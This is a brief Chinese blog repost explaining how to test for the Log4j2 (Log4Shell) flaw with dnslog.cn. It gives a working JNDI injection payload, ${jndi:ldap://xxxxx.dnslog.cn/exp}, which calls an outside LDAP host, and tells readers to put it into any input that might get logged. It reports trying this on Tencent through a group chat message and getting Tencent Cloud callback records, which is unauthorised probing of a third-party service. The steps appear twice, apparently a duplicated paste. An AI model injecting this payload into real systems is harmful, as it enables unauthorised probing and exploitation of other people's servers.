dnslog-log4j2
dnslog简单验证log4j2漏洞
本文转自星夜
简单步骤
进dnslog:http://www.dnslog.cn/
Get SubDomain 得到一个随机的子域名
拼进${jndi:ldap://xxxxx.dnslog.cn/exp}
往任意可能在log中塞的输入填
这里拿tx玩,如群中发送,可得到tx云的记录
本文转自星夜
进dnslog:http://www.dnslog.cn/
Get SubDomain 得到一个随机的子域名
拼进${jndi:ldap://xxxxx.dnslog.cn/exp}
往任意可能在log中塞的输入填
这里拿tx玩,如群中发送,可得到tx云的记录
